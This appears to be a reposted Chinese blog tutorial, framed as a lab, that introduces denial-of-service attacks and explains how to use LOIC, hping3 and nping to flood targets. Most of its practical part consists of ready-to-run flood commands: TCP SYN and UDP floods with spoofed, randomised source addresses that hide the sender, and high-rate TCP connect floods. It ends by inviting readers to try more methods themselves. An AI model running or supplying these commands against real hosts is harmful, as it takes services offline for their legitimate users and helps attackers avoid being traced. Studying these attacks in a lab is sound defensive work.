簡介

概念：

DoS攻擊通常是利用傳輸協議的漏洞、系統存在的漏洞、服務的漏洞，對目標系統發起大規模的進攻，用超出目標處理能力的海量數據包消耗可用系統資源、帶寬資源等，或造成程序緩沖區溢出錯誤，致使其無法處理合法用戶的正常請求，無法提供正常服務，最終致使網絡服務癱瘓，甚至引起系統死機。這是破壞攻擊目標正常運行的一種“損人不利己”的攻擊手段。

最常見的DoS攻擊行為有網絡帶寬攻擊和連通性攻擊。帶寬攻擊指以極大的通信量沖擊網絡，使得所有可用網絡資源都被消耗殆盡，最后導致合法的用戶請求無法通過。連通性攻擊指用大量的連接請求沖擊計算機，使得所有可用的操作系統資源都被消耗殆盡，最終計算機無法再處理合法用戶的請求。

分類：

主要有Land攻擊、死亡之ping、淚滴、Smurf攻擊及SYN洪水等。

實驗內容

這次我們主要介紹簡單關于TCP，UDP等相關攻擊的工具的使用

一：使用LOIC（盧瓦，低軌道離子炮）攻擊

最知名的DOS工具之一，黑客組織匿名者官方使用工具。支持TCP/UDP/HTTP大規模流量泛洪。

LOIC使用方法

1、選擇URL或IP；

2、設置攻擊模式(HTTP,UDP,TCP)、端口號(PORT)、線程(Threads)、速度(可拉)

3、啟動攻擊（點擊IMMA CHARGIN MAH LAZER）

4、效果（開啟Wireshark抓包）

二：使用hping3（kali）進行DoS攻擊

• -c：發送數據包的個數
• -d：每個數據包的大小
• -S：發送SYN數據包
• -w：TCP window大小
• -p：目標端口，你可以指定任意端口
• –flood：盡可能快的發送數據包
• –rand-source：使用隨機的IP地址，使得安全設備不能定位實際IP；
• -a或–spoof：隱藏主機名
• com：目的IP地址或網站

例：使用hping3進行TCP攻擊

hping3 -c 10000 -d 120 -S -w 64 -p 80 --flood --rand-source ip/域名

還有很多攻擊方式如：

SYN? Flood

# hping3 -S --flood -V testsite.com

UDP Flood

– hping3 -a?1.1.1.1 --udp -s 53 -d 100 -p 53 --flood?1.1.1.2

-s:指定源端口，不指定也可以

方法還有很多就不截圖了大家自己去調試！

三：使用Nping3（kali）進行DoS攻擊

TCP全鏈接DoS攻擊
– nping --tcp-connect --rate=10000 -c 1000000000 -q 192.168.33.135
--tcp-connect：建立tcp連接 --rate=10000：速率一萬個

例：使用nping實現TCP連接攻擊：

# nping --tcp-connect -rate=90000 -c 900000 -q ip/域名

總結

以上是生活随笔為你收集整理的网络安全之DOS攻击的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。